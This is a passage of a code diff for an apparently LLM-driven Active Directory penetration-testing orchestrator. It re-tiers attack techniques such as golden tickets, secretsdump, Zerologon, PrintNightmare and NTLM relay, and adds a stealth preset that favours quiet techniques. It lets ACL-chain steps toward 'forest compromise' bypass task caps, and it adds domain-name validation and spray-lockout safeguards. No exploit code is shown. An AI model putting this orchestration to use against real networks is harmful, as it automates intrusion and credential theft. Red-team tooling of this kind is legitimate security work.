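fn drain_order(tasks: Vec<(&'static str, u8)>) -> Vec<&'static str> {
    // Min-heap on (weight, name): lower weight pops first.
    let mut heap: BinaryHeap<Reverse<(u8, &'static str)>> =
        tasks.into_iter().map(|(t, w)| Reverse((w, t))).collect();
    let mut out = Vec::new();
    while let Some(Reverse((_, t))) = heap.pop() {
        out.push(t);
    }
    out
}

// drain_order(vec![("secretsdump", 2), ("esc1", 1), ("dns_enum", 3)])
// yields ["esc1", "secretsdump", "dns_enum"]; under the old flat weights all
// entries tied at 3 and the order degenerated to arrival (FIFO).
```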
fn comprehensive_weights() -> HashMap { [ - ("dc_secretsdump", 3), - ("golden_ticket", 3), - ("forest_trust_escalation", 3), - ("child_to_parent", 3), - ("domain_admin", 3), - ("secretsdump", 3), - ("credential_reuse", 3), - ("mssql_access", 3), - ("mssql_linked_server", 3), - ("mssql_impersonation", 3), - ("constrained_delegation", 3), - ("unconstrained_delegation", 3), - ("esc1", 3), - ("esc4", 3), - ("esc8", 3), - ("rbcd", 3), - ("acl_abuse", 3), - ("shadow_credentials", 3), - ("mssql_deep_exploitation", 3), - ("kerberoast", 3), - ("asrep_roast", 3), - ("password_spray", 3), - ("gmsa", 3), - ("low_hanging_fruit", 3), + // --- Tier 1: Exploitation breadth (these were starved before) --- + ("esc1", 1), + ("esc4", 1), + ("esc8", 1), + ("adcs_esc1", 1), + ("adcs_esc4", 1), + ("adcs_esc8", 1), + ("constrained_delegation", 1), + ("unconstrained_delegation", 1), + ("ntlm_relay", 1), + ("rbcd", 1), + ("acl_abuse", 1), + ("dacl_abuse", 1), + ("shadow_credentials", 1), + ("gpo_abuse", 1), + ("nopac", 1), + ("certifried", 1), + ("krbrelayup", 1), + ("printnightmare", 1), + // --- Tier 2: Credential pipeline + lateral + persistence --- + ("dc_secretsdump", 2), + ("golden_ticket", 2), + ("forest_trust_escalation", 2), + ("child_to_parent", 2), + ("domain_admin", 2), + ("secretsdump", 2), + ("credential_reuse", 2), + ("mssql_access", 2), + ("mssql_linked_server", 2), + ("mssql_impersonation", 2), + ("mssql_deep_exploitation", 2), + ("kerberoast", 2), + ("asrep_roast", 2), + ("password_spray", 2), + ("gmsa", 2), + ("laps", 2), + ("low_hanging_fruit", 2), + ("gpp_sysvol", 2), + ("certipy_auth", 2), + ("lsassy_dump", 2), + ("pth_spray", 2), + ("winrm_lateral", 2), + ("rdp_lateral", 2), + ("localuser_spray", 2), + // --- Tier 3: Recon, enumeration, coercion setup --- ("smb_signing_disabled", 3), - ("adcs_esc1", 3), - ("adcs_esc4", 3), - ("adcs_esc8", 3), - ("gpo_abuse", 3), - ("laps", 3), + ("share_coercion", 3), + ("mssql_coercion", 3), + ("password_policy", 3), + ("ntlmv1_downgrade", 3), + ("ldap_signing", 3), + ("webdav_detection", 3), + ("spooler_check", 3), + ("machine_account_quota", 3), + ("dfs_coercion", 3), + ("petitpotam_unauth", 3), + ("group_enumeration", 3), + ("searchconnector_coercion", 3), + ("foreign_group_enum", 3), + ("sid_enumeration", 3), + ("dns_enum", 3), + ("domain_user_enumeration", 3), + ("smbclient_enum", 3), + ("zerologon", 3), + ("cross_forest_enum", 3), + ("acl_discovery", 2), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) @@ -370,6 +451,39 @@ fn stealth_weights() -> HashMap { ("adcs_esc8", 2), ("gpo_abuse", 3), ("laps", 3), + ("ntlm_relay", 7), + ("nopac", 5), + ("zerologon", 4), + ("printnightmare", 8), + ("share_coercion", 6), + ("mssql_coercion", 5), + ("password_policy", 2), + ("gpp_sysvol", 2), + ("ntlmv1_downgrade", 2), + ("ldap_signing", 2), + ("webdav_detection", 3), + ("spooler_check", 2), + ("machine_account_quota", 2), + ("dfs_coercion", 6), + ("petitpotam_unauth", 5), + ("winrm_lateral", 4), + ("group_enumeration", 2), + ("localuser_spray", 7), + ("krbrelayup", 4), + ("searchconnector_coercion", 6), + ("lsassy_dump", 5), + ("rdp_lateral", 4), + ("foreign_group_enum", 2), + ("certipy_auth", 1), + ("sid_enumeration", 2), + ("dns_enum", 2), + ("domain_user_enumeration", 2), + ("pth_spray", 5), + ("certifried", 3), + ("dacl_abuse", 2), + ("smbclient_enum", 3), + ("cross_forest_enum", 2), + ("acl_discovery", 1), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) @@ -471,11 +585,20 @@ mod tests { } #[test] - fn comprehensive_flat_weights() { + fn 
comprehensive_tiered_weights() { let s = Strategy::from_preset(StrategyPreset::Comprehensive); - assert_eq!(s.effective_priority("secretsdump"), 3); - assert_eq!(s.effective_priority("esc1"), 3); - assert_eq!(s.effective_priority("acl_abuse"), 3); + // Tier 1: exploitation breadth — highest priority + assert_eq!(s.effective_priority("esc1"), 1); + assert_eq!(s.effective_priority("acl_abuse"), 1); + assert_eq!(s.effective_priority("constrained_delegation"), 1); + assert_eq!(s.effective_priority("ntlm_relay"), 1); + // Tier 2: credential pipeline + assert_eq!(s.effective_priority("secretsdump"), 2); + assert_eq!(s.effective_priority("kerberoast"), 2); + assert_eq!(s.effective_priority("golden_ticket"), 2); + // Tier 3: recon/enumeration + assert_eq!(s.effective_priority("group_enumeration"), 3); + assert_eq!(s.effective_priority("dns_enum"), 3); } #[test] @@ -625,7 +748,44 @@ mod tests { #[test] fn new_technique_weights_in_presets() { // Verify that new techniques added in this branch are in all presets - let new_techniques = ["rbcd", "shadow_credentials", "mssql_deep_exploitation"]; + let new_techniques = [ + "rbcd", + "shadow_credentials", + "mssql_deep_exploitation", + "ntlm_relay", + "nopac", + "zerologon", + "printnightmare", + "share_coercion", + "mssql_coercion", + "password_policy", + "gpp_sysvol", + "ntlmv1_downgrade", + "ldap_signing", + "webdav_detection", + "spooler_check", + "machine_account_quota", + "dfs_coercion", + "petitpotam_unauth", + "winrm_lateral", + "group_enumeration", + "localuser_spray", + "krbrelayup", + "searchconnector_coercion", + "lsassy_dump", + "rdp_lateral", + "foreign_group_enum", + "certipy_auth", + "sid_enumeration", + "dns_enum", + "domain_user_enumeration", + "pth_spray", + "certifried", + "dacl_abuse", + "smbclient_enum", + "cross_forest_enum", + "acl_discovery", + ]; for preset in [ StrategyPreset::Fast, StrategyPreset::Comprehensive, @@ -643,20 +803,26 @@ mod tests { } #[test] - fn comprehensive_has_equal_weights() { + fn comprehensive_has_tiered_weights() { let s = Strategy::from_preset(StrategyPreset::Comprehensive); - // All comprehensive weights should be 3 + // All weights should be 1, 2, or 3 for (tech, weight) in &s.weights { - assert_eq!(*weight, 3, "Technique {tech} has weight {weight} != 3"); + assert!( + (1..=3).contains(weight), + "Technique {tech} has weight {weight}, expected 1-3" + ); } } #[test] fn stealth_penalizes_noisy_techniques() { let s = Strategy::from_preset(StrategyPreset::Stealth); - // Password spray and SMB signing should be most penalized (8) + // Password spray, SMB signing, and PrintNightmare should be most penalized (8) assert_eq!(s.effective_priority("password_spray"), 8); assert_eq!(s.effective_priority("smb_signing_disabled"), 8); + assert_eq!(s.effective_priority("printnightmare"), 8); + // NTLM relay is noisy too (7) + assert_eq!(s.effective_priority("ntlm_relay"), 7); // ADCS/ACL should be most prioritized (1) assert_eq!(s.effective_priority("esc1"), 1); assert_eq!(s.effective_priority("acl_abuse"), 1); diff --git a/ares-cli/src/orchestrator/task_queue.rs b/ares-cli/src/orchestrator/task_queue.rs index 45aba1a1..850cce51 100644 --- a/ares-cli/src/orchestrator/task_queue.rs +++ b/ares-cli/src/orchestrator/task_queue.rs @@ -81,6 +81,10 @@ pub struct HeartbeatData { pub pod_name: Option, } +// --------------------------------------------------------------------------- +// TaskQueueCore — thin async wrapper around a redis connection. 
+// --------------------------------------------------------------------------- + /// Async Redis task queue implementing the Ares queue protocol. /// /// Generic over connection type to support both production (`ConnectionManager`) @@ -124,6 +128,11 @@ impl TaskQueue { /// Create a dedicated (non-shared) multiplexed connection for blocking /// commands like BRPOP. Each call opens a fresh TCP connection so /// concurrent BRPOP calls from different agent loops do not serialize. + /// + /// Disables the redis-rs default 500ms response_timeout — BRPOP for tool + /// results blocks for up to `tool_timeout` (1500s default), so the + /// per-command socket timeout would fire long before the result arrives, + /// surfacing as `Io: timed out` errors. pub async fn dedicated_connection(&self) -> Result { let url = self .redis_url @@ -131,8 +140,10 @@ impl TaskQueue { .ok_or_else(|| anyhow::anyhow!("No redis_url stored (test backend?)"))?; let client = redis::Client::open(url).with_context(|| format!("Invalid Redis URL: {url}"))?; + let config = redis::AsyncConnectionConfig::new() + .set_response_timeout(Some(Duration::from_secs(1800))); let conn = client - .get_multiplexed_async_connection() + .get_multiplexed_async_connection_with_config(&config) .await .with_context(|| "Failed to open dedicated Redis connection for BRPOP")?; Ok(conn) diff --git a/ares-cli/src/orchestrator/throttling.rs b/ares-cli/src/orchestrator/throttling.rs index ff4ecee8..06c3d09e 100644 --- a/ares-cli/src/orchestrator/throttling.rs +++ b/ares-cli/src/orchestrator/throttling.rs @@ -34,7 +34,13 @@ const CRITICAL_PATH_VULN_TYPES: &[&str] = &[ ]; /// Maximum tasks allowed to bypass the hard cap simultaneously. -const MAX_BYPASS_TASKS: usize = 3; +/// +/// Sized to accommodate restart-requeue scenarios where many in-flight critical +/// tasks rehydrate at once and the active-task tracker hasn't yet evicted stale +/// entries from the previous orchestrator instance. With MAX_BYPASS_TASKS=3 the +/// bypass channel saturates trivially and even ACL chain steps deadlock waiting +/// for stale exploit tasks to be evicted. +const MAX_BYPASS_TASKS: usize = 10; /// What the throttler decided about a candidate task. #[derive(Debug, Clone, PartialEq, Eq)] @@ -101,6 +107,18 @@ impl Throttler { let hard_cap = self.config.hard_cap(); if llm_count >= hard_cap { + // Always-bypass tasks (acl_chain_step) skip even the bypass-cap. + // Stale exploit-task buildup must not block the ACL exploitation + // pipeline since those steps are the actual path to forest + // compromise. + if self.is_always_bypass(task_type) { + info!( + llm_count, + hard_cap, task_type, "Hard cap: always-bypass critical task — allowing" + ); + return ThrottleDecision::Allow; + } + if self.is_critical_path(task_type, payload) { let bypass_count = llm_count.saturating_sub(hard_cap); if bypass_count >= MAX_BYPASS_TASKS { @@ -129,7 +147,7 @@ impl Throttler { if llm_count >= max_tasks { let role_count = self.tracker.count_for_role(target_role).await; - let min_per_role = 1_usize; // matches get_min_slots_per_role default + let min_per_role = self.config.max_tasks_per_role; if role_count < min_per_role { info!( llm_count, @@ -201,7 +219,22 @@ impl Throttler { sem.try_acquire_owned().ok() } + /// Task types that bypass even the bypass-cap (always allowed past hard cap). 
+ /// These are paths whose dispatch must never be blocked by stale or + /// hung in-flight tasks — `acl_chain_step` runs from `auto_dacl_abuse` + /// with a pre-resolved credential and is the practical path to forest + /// compromise via ACL exploitation. + fn is_always_bypass(&self, task_type: &str) -> bool { + matches!(task_type, "acl_chain_step") + } + fn is_critical_path(&self, task_type: &str, payload: Option<&serde_json::Value>) -> bool { + // Always-bypass tasks are also critical path (covered separately + // earlier in `check`, but keep the function consistent). + if self.is_always_bypass(task_type) { + return true; + } + // Check exploit + vuln_type if CRITICAL_PATH_TASK_TYPES.contains(&task_type) { if let Some(p) = payload { @@ -317,6 +350,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: Instant::now(), + credential_key: None, }) .await; } @@ -336,6 +370,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: Instant::now(), + credential_key: None, }) .await; } @@ -356,6 +391,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: Instant::now(), + credential_key: None, }) .await; } @@ -377,6 +413,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: Instant::now(), + credential_key: None, }) .await; } @@ -387,6 +424,52 @@ mod tests { ); } + #[tokio::test] + async fn critical_path_acl_chain_step_bypasses_hard_cap() { + let (t, tracker) = make_throttler(2); + // Saturate well beyond hard_cap (3) and beyond MAX_BYPASS_TASKS (10) + // to verify acl_chain_step bypasses even the bypass-cap. + for i in 0..50 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "exploit".into(), + role: "privesc".into(), + submitted_at: Instant::now(), + credential_key: None, + }) + .await; + } + let payload = json!({"acl_type": "writeproperty", "target_user": "krbtgt"}); + assert_eq!( + t.check("acl_chain_step", "acl", Some(&payload)).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn critical_path_exploit_still_bypass_capped() { + let (t, tracker) = make_throttler(2); + // Saturate beyond MAX_BYPASS_TASKS — ordinary critical-path exploits + // must still be deferred (only acl_chain_step is always-bypass). + for i in 0..50 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "exploit".into(), + role: "privesc".into(), + submitted_at: Instant::now(), + credential_key: None, + }) + .await; + } + let payload = json!({"vuln_type": "constrained_delegation"}); + assert_eq!( + t.check("exploit", "privesc", Some(&payload)).await, + ThrottleDecision::Defer + ); + } + #[tokio::test] async fn rate_limit_triggers_backoff() { let (t, _) = make_throttler(8); diff --git a/ares-cli/src/orchestrator/tool_dispatcher/domain_validator.rs b/ares-cli/src/orchestrator/tool_dispatcher/domain_validator.rs new file mode 100644 index 00000000..77ce7201 --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/domain_validator.rs @@ -0,0 +1,188 @@ +//! Validate `domain` arguments on outgoing LLM tool calls. +//! +//! The LLM occasionally fat-fingers domain names in tool arguments +//! (e.g. `child.contossso.local` instead of `child.contoso.local`). +//! Tools accept the typo silently, then auth fails, credential lineage breaks, +//! and downstream consumers (cross-forest forge, ADCS enum, credential_resolver) +//! get misdirected. The publishing-side guard already keeps these typos out of +//! 
`state.domains`, but the typo'd value still rides on credential records and +//! pollutes per-credential routing. +//! +//! This module rejects tool calls whose `domain` argument doesn't match any +//! domain that authoritative recon has discovered. The LLM gets a synchronous +//! error listing valid domains and retries with the right spelling. + +use tracing::warn; + +use ares_core::state::RedisStateReader; +use ares_llm::{ToolCall, ToolExecResult}; + +use crate::orchestrator::task_queue::TaskQueue; + +/// Inspect a tool call's `domain` argument; return a synthetic error result +/// if it looks like a hallucinated FQDN. Returns `None` to allow the call. +/// +/// Allow rules: +/// - No `domain` arg, or empty → allow. +/// - Domain has no dot (workgroup-style label like `WORKGROUP`) → allow. +/// - Domain matches `state.domains` ∪ DC-map keys ∪ trusted-domain keys +/// (case-insensitive) → allow. +/// - Known-domain set is empty (early in the op, no recon yet) → allow. +/// +/// Otherwise: reject with an error listing the known domains. +pub(super) async fn check_domain_arg( + queue: &TaskQueue, + operation_id: &str, + call: &ToolCall, +) -> Option<ToolExecResult> { + let supplied = call.arguments.get("domain").and_then(|v| v.as_str())?; + let supplied = supplied.trim(); + if supplied.is_empty() || !supplied.contains('.') { + return None; + } + let supplied_lc = supplied.to_lowercase(); + + let mut conn = queue.connection(); + let reader = RedisStateReader::new(operation_id.to_string()); + + let domains = reader.get_domains(&mut conn).await.unwrap_or_default(); + let dc_keys: Vec<String> = reader + .get_dc_map(&mut conn) + .await + .unwrap_or_default() + .into_keys() + .collect(); + let trusted: Vec<String> = reader + .get_trusted_domains(&mut conn) + .await + .unwrap_or_default() + .into_keys() + .collect(); + + let mut known: Vec<String> = domains + .into_iter() + .chain(dc_keys.into_iter()) + .chain(trusted.into_iter()) + .map(|d| d.to_lowercase()) + .collect(); + known.sort(); + known.dedup(); + + if known.is_empty() { + return None; + } + if known.iter().any(|d| d == &supplied_lc) { + return None; + } + + // Also consult cred/hash records: their `domain` field may legitimately + // carry NetBIOS-style or freshly-discovered values that haven't yet been + // promoted into the canonical domains set. Only reject if the supplied + // value is foreign to every channel. + if let Ok(creds) = reader.get_credentials(&mut conn).await { + if creds + .iter() + .any(|c| c.domain.eq_ignore_ascii_case(supplied)) + { + return None; + } + } + + warn!( + tool = %call.name, + supplied = %supplied, + known = ?known, + "Rejecting tool call: domain argument not in known domains" + ); + + let suggestion = closest_match(&supplied_lc, &known); + let message = match suggestion { + Some(s) => format!( + "Unknown domain '{}'. Known domains: [{}]. Did you mean '{}'?", + supplied, + known.join(", "), + s + ), + None => format!( + "Unknown domain '{}'. Known domains: [{}]. Use one of these exactly, or call a recon tool first to discover the correct FQDN.", + supplied, + known.join(", ") + ), + }; + + Some(ToolExecResult { + output: String::new(), + error: Some(message), + discoveries: None, + }) +} + +/// Return the known domain with the smallest edit distance to `supplied`, +/// if any are within distance 3. Used only to nudge the LLM in the error. +fn closest_match(supplied: &str, known: &[String]) -> Option<String> { + known + .iter() + .map(|d| (d.clone(), edit_distance(supplied, d))) + .filter(|(_, dist)| *dist <= 3) + .min_by_key(|(_, dist)| *dist) + .map(|(d, _)| d) +} + +fn edit_distance(a: &str, b: &str) -> usize { + let a: Vec<char> = a.chars().collect(); + let b: Vec<char> = b.chars().collect(); + let (n, m) = (a.len(), b.len()); + if n == 0 { + return m; + } + if m == 0 { + return n; + } + let mut prev: Vec<usize> = (0..=m).collect(); + let mut curr = vec![0usize; m + 1]; + for i in 1..=n { + curr[0] = i; + for j in 1..=m { + let cost = if a[i - 1] == b[j - 1] { 0 } else { 1 }; + curr[j] = (prev[j] + 1).min(curr[j - 1] + 1).min(prev[j - 1] + cost); + } + std::mem::swap(&mut prev, &mut curr); + } + prev[m] +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn edit_distance_basic() { + assert_eq!(edit_distance("contoso.local", "contoso.local"), 0); + assert_eq!( + edit_distance("child.contossso.local", "child.contoso.local"), + 2 + ); + assert_eq!( + edit_distance("child.contosssso.local", "child.contoso.local"), + 3 + ); + assert!(edit_distance("foo.bar", "completely.different") > 5); + } + + #[test] + fn closest_match_picks_nearest() { + let known = vec![ + "fabrikam.local".to_string(), + "child.contoso.local".to_string(), + "contoso.local".to_string(), + ]; + let picked = closest_match("child.contossso.local", &known); + assert_eq!(picked.as_deref(), Some("child.contoso.local")); + } + + #[test] + fn closest_match_returns_none_when_far() { + let known = vec!["fabrikam.local".to_string()]; + assert!(closest_match("totally.unrelated.domain", &known).is_none()); + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/local.rs b/ares-cli/src/orchestrator/tool_dispatcher/local.rs index ef5e9505..1c8286b7 100644 --- a/ares-cli/src/orchestrator/tool_dispatcher/local.rs +++ b/ares-cli/src/orchestrator/tool_dispatcher/local.rs @@ -1,13 +1,16 @@ //! In-process tool dispatcher (no Redis). use anyhow::Result; -use tracing::debug; +use tracing::{debug, warn}; use ares_llm::{ToolCall, ToolExecResult}; +use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueue; +use crate::worker::credential_resolver::resolve_credentials; -use super::{extract_credential_key, push_realtime_discoveries, AuthThrottle}; +use super::domain_validator::check_domain_arg; +use super::{extract_credential_key, inject_excluded_users, push_realtime_discoveries, AuthThrottle}; /// Dispatches tool calls directly via `ares_tools::dispatch` without Redis. /// @@ -17,6 +20,7 @@ pub struct LocalToolDispatcher { pub(super) queue: TaskQueue, pub(super) operation_id: String, pub(super) auth_throttle: AuthThrottle, + pub(super) state: Option<SharedState>, } impl LocalToolDispatcher { @@ -25,8 +29,16 @@ queue, operation_id, auth_throttle, + state: None, } } + + /// Attach orchestrator state so spray-style tool calls can be augmented + /// with the current quarantine list before dispatch. + pub fn with_state(mut self, state: SharedState) -> Self { + self.state = Some(state); + self + } } #[async_trait::async_trait] impl ares_llm::ToolDispatcher for LocalToolDispatcher { async fn dispatch( &self, _task_id: &str, call: &ToolCall, ) -> Result<ToolExecResult> { + // Reject calls whose `domain` argument doesn't match a known domain.
+ if let Some(rejection) = check_domain_arg(&self.queue, &self.operation_id, call).await { + return Ok(rejection); + } + // Rate-limit auth-bearing tools to prevent AD account lockout if let Some(cred_key) = extract_credential_key(call) { self.auth_throttle.acquire(&cred_key).await; @@ -44,7 +61,34 @@ impl ares_llm::ToolDispatcher for LocalToolDispatcher { debug!(tool = %call.name, "Executing tool locally"); - match ares_tools::dispatch(&call.name, &call.arguments).await { + // Resolve credentials from operation state. The LLM never passes + // secret material — usernames + domains only. Mirrors the worker + // tool_executor path so local (in-process) dispatch gets the same + // injection. + let mut resolved_arguments = call.arguments.clone(); + // Spray hygiene: augment excluded_users from the current quarantine + // list before dispatch. Done before credential resolution so the + // domain arg (used for the lookup) is the LLM-supplied target. + inject_excluded_users(&self.state, &call.name, &mut resolved_arguments).await; + let mut conn = self.queue.connection(); + if let Err(e) = resolve_credentials( + &mut conn, + Some(self.operation_id.as_str()), + &call.name, + &mut resolved_arguments, + ) + .await + { + warn!( + tool = %call.name, + err = %e, + "credential_resolver failed; continuing with original arguments" + ); + resolved_arguments = call.arguments.clone(); + inject_excluded_users(&self.state, &call.name, &mut resolved_arguments).await; + } + + match ares_tools::dispatch(&call.name, &resolved_arguments).await { Ok(output) => { let raw = output.combined_raw(); let combined = output.combined(); @@ -56,7 +100,7 @@ impl ares_llm::ToolDispatcher for LocalToolDispatcher { // Parse structured discoveries from raw (unfiltered) output let discoveries = - ares_tools::parsers::parse_tool_output(&call.name, &raw, &call.arguments); + ares_tools::parsers::parse_tool_output(&call.name, &raw, &resolved_arguments); let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { None } else { @@ -70,7 +114,7 @@ impl ares_llm::ToolDispatcher for LocalToolDispatcher { &self.operation_id, disc, &call.name, - &call.arguments, + &resolved_arguments, ) .await; } diff --git a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs index 0e8d4155..0c777784 100644 --- a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs +++ b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs @@ -14,10 +14,11 @@ use redis::AsyncCommands; use serde::{Deserialize, Serialize}; use tracing::debug; -use crate::orchestrator::state::DISCOVERY_KEY_PREFIX; +use crate::orchestrator::state::{SharedState, DISCOVERY_KEY_PREFIX}; use crate::orchestrator::task_queue::TaskQueue; mod auth_throttle; +mod domain_validator; mod local; mod redis_dispatcher; #[cfg(test)] @@ -80,6 +81,7 @@ const RECON_ROUTED_TOOLS: &[&str] = &[ "smbclient_spider", "check_credman_entries", "check_autologon_registry", + "smb_login_check", "domain_admin_checker", "gmsa_dump_passwords", ]; @@ -98,6 +100,7 @@ const AUTH_BEARING_TOOLS: &[&str] = &[ "smbclient_spider", "check_credman_entries", "check_autologon_registry", + "smb_login_check", "domain_admin_checker", "gmsa_dump_passwords", // impacket tools @@ -116,6 +119,65 @@ const AUTH_BEARING_TOOLS: &[&str] = &[ "smbclient_kerberos_shares", ]; +/// Spray-style tools that accept `excluded_users` to skip already-locked +/// accounts. 
The dispatcher auto-injects the current quarantine list so the
+/// LLM cannot omit it (or pass a stale value) and re-lock those accounts.
+const SPRAY_TOOLS: &[&str] = &["password_spray", "username_as_password"];
+
+/// Merge the current per-domain quarantine list into `excluded_users` on
+/// spray-style tool calls. Mutates `arguments` in place; no-op for tools
+/// outside `SPRAY_TOOLS`, when `state` is unset, or when no domain arg is
+/// present. Preserves any LLM-supplied `excluded_users` by union-merging.
+pub(super) async fn inject_excluded_users(
+    state: &Option<SharedState>,
+    tool_name: &str,
+    arguments: &mut serde_json::Value,
+) {
+    if !SPRAY_TOOLS.contains(&tool_name) {
+        return;
+    }
+    let Some(state) = state else { return };
+    let Some(domain) = arguments
+        .get("domain")
+        .and_then(|v| v.as_str())
+        .map(str::to_string)
+    else {
+        return;
+    };
+    let quarantined = state.read().await.quarantined_users_in_domain(&domain);
+    if quarantined.is_empty() {
+        return;
+    }
+
+    let existing = arguments
+        .get("excluded_users")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+    let mut set: std::collections::BTreeSet<String> = quarantined
+        .iter()
+        .map(|u| u.to_lowercase())
+        .collect();
+    for u in existing.split(',') {
+        let trimmed = u.trim();
+        if !trimmed.is_empty() {
+            set.insert(trimmed.to_lowercase());
+        }
+    }
+    let merged: Vec<String> = set.into_iter().collect();
+    if let Some(obj) = arguments.as_object_mut() {
+        obj.insert(
+            "excluded_users".to_string(),
+            serde_json::Value::String(merged.join(",")),
+        );
+        debug!(
+            tool = %tool_name,
+            domain = %domain,
+            count = merged.len(),
+            "Auto-injected excluded_users from quarantine"
+        );
+    }
+}
+
 /// Extract a credential key from tool call arguments for rate limiting.
 /// Returns `Some("user@domain")` if the tool authenticates with credentials.
 pub(super) fn extract_credential_key(call: &ares_llm::ToolCall) -> Option<String> {
diff --git a/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs b/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs
index ed20330c..bd4fcbe4 100644
--- a/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs
+++ b/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs
@@ -8,11 +8,13 @@ use ares_core::telemetry::propagation::inject_traceparent;
 use ares_core::telemetry::spans::{producer_span, Team};
 use ares_llm::{ToolCall, ToolExecResult};
 
+use crate::orchestrator::state::SharedState;
 use crate::orchestrator::task_queue::TaskQueue;
 
+use super::domain_validator::check_domain_arg;
 use super::{
-    extract_credential_key, push_realtime_discoveries, AuthThrottle, ToolExecRequest,
-    ToolExecResponse, RESULT_TTL_SECS, TOOL_EXEC_PREFIX, TOOL_RESULT_PREFIX,
+    extract_credential_key, inject_excluded_users, push_realtime_discoveries, AuthThrottle,
+    ToolExecRequest, ToolExecResponse, RESULT_TTL_SECS, TOOL_EXEC_PREFIX, TOOL_RESULT_PREFIX,
 };
 
 /// Dispatches tool calls to workers via Redis queues.
@@ -26,6 +28,7 @@ pub struct RedisToolDispatcher {
     pub(super) tool_timeout: std::time::Duration,
     pub(super) operation_id: String,
     pub(super) auth_throttle: AuthThrottle,
+    pub(super) state: Option<SharedState>,
 }
 
 impl RedisToolDispatcher {
@@ -35,8 +38,16 @@ impl RedisToolDispatcher {
             tool_timeout: std::time::Duration::from_secs(super::DEFAULT_TOOL_TIMEOUT_SECS),
             operation_id,
             auth_throttle,
+            state: None,
         }
     }
+
+    /// Attach orchestrator state so spray-style tool calls can be augmented
+    /// with the current quarantine list before dispatch.
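+    /// Call-site sketch (wiring names illustrative):
+    /// `RedisToolDispatcher::new(queue, operation_id, throttle).with_state(shared_state)`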
+ pub fn with_state(mut self, state: SharedState) -> Self { + self.state = Some(state); + self + } } #[async_trait::async_trait] @@ -56,11 +67,26 @@ impl ares_llm::ToolDispatcher for RedisToolDispatcher { ); async { + // Reject calls whose `domain` argument doesn't match a known + // domain — catches LLM typos before they pollute credential + // records or misroute downstream tooling. + if let Some(rejection) = + check_domain_arg(&self.queue, &self.operation_id, call).await + { + return Ok(rejection); + } + // Rate-limit auth-bearing tools to prevent AD account lockout if let Some(cred_key) = extract_credential_key(call) { self.auth_throttle.acquire(&cred_key).await; } + // Server-side spray hygiene: union the current per-domain + // quarantine list into excluded_users. The LLM cannot be relied + // on to pass this consistently across many spray invocations. + let mut arguments = call.arguments.clone(); + inject_excluded_users(&self.state, &call.name, &mut arguments).await; + let call_id = format!("{}_{}", call.name, uuid::Uuid::new_v4().simple()); // Inject trace context for cross-service span linking @@ -70,7 +96,7 @@ impl ares_llm::ToolDispatcher for RedisToolDispatcher { call_id: call_id.clone(), task_id: task_id.to_string(), tool_name: call.name.clone(), - arguments: call.arguments.clone(), + arguments, traceparent, operation_id: Some(self.operation_id.clone()), }; diff --git a/ares-cli/src/orchestrator/tool_dispatcher/tests.rs b/ares-cli/src/orchestrator/tool_dispatcher/tests.rs index eeabb95a..aa47c5bb 100644 --- a/ares-cli/src/orchestrator/tool_dispatcher/tests.rs +++ b/ares-cli/src/orchestrator/tool_dispatcher/tests.rs @@ -96,3 +96,76 @@ fn cross_role_routing_recon_stays_recon() { "recon" ); } + +#[tokio::test] +async fn inject_excluded_users_no_state_is_noop() { + let mut args = serde_json::json!({"target": "1.2.3.4", "domain": "contoso.local"}); + inject_excluded_users(&None, "password_spray", &mut args).await; + assert!(args.get("excluded_users").is_none()); +} + +#[tokio::test] +async fn inject_excluded_users_skips_non_spray_tools() { + let state = SharedState::new("op-1".into()); + state + .write() + .await + .quarantine_user("testuser1", "contoso.local"); + let mut args = serde_json::json!({"target": "1.2.3.4", "domain": "contoso.local"}); + inject_excluded_users(&Some(state), "smb_login_check", &mut args).await; + assert!(args.get("excluded_users").is_none()); +} + +#[tokio::test] +async fn inject_excluded_users_populates_from_state() { + let state = SharedState::new("op-1".into()); + { + let mut s = state.write().await; + s.quarantine_user("testuser1", "contoso.local"); + s.quarantine_user("testuser2", "contoso.local"); + s.quarantine_user("testuser3", "fabrikam.local"); + } + let mut args = serde_json::json!({"target": "1.2.3.4", "domain": "contoso.local"}); + inject_excluded_users(&Some(state), "password_spray", &mut args).await; + let excluded = args + .get("excluded_users") + .and_then(|v| v.as_str()) + .unwrap(); + let mut parts: Vec<&str> = excluded.split(',').collect(); + parts.sort(); + assert_eq!(parts, vec!["testuser1", "testuser2"]); +} + +#[tokio::test] +async fn inject_excluded_users_unions_with_existing() { + let state = SharedState::new("op-1".into()); + state + .write() + .await + .quarantine_user("testuser1", "contoso.local"); + let mut args = serde_json::json!({ + "target": "1.2.3.4", + "domain": "contoso.local", + "excluded_users": "Administrator,testuser2", + }); + inject_excluded_users(&Some(state), "username_as_password", &mut args).await; + let 
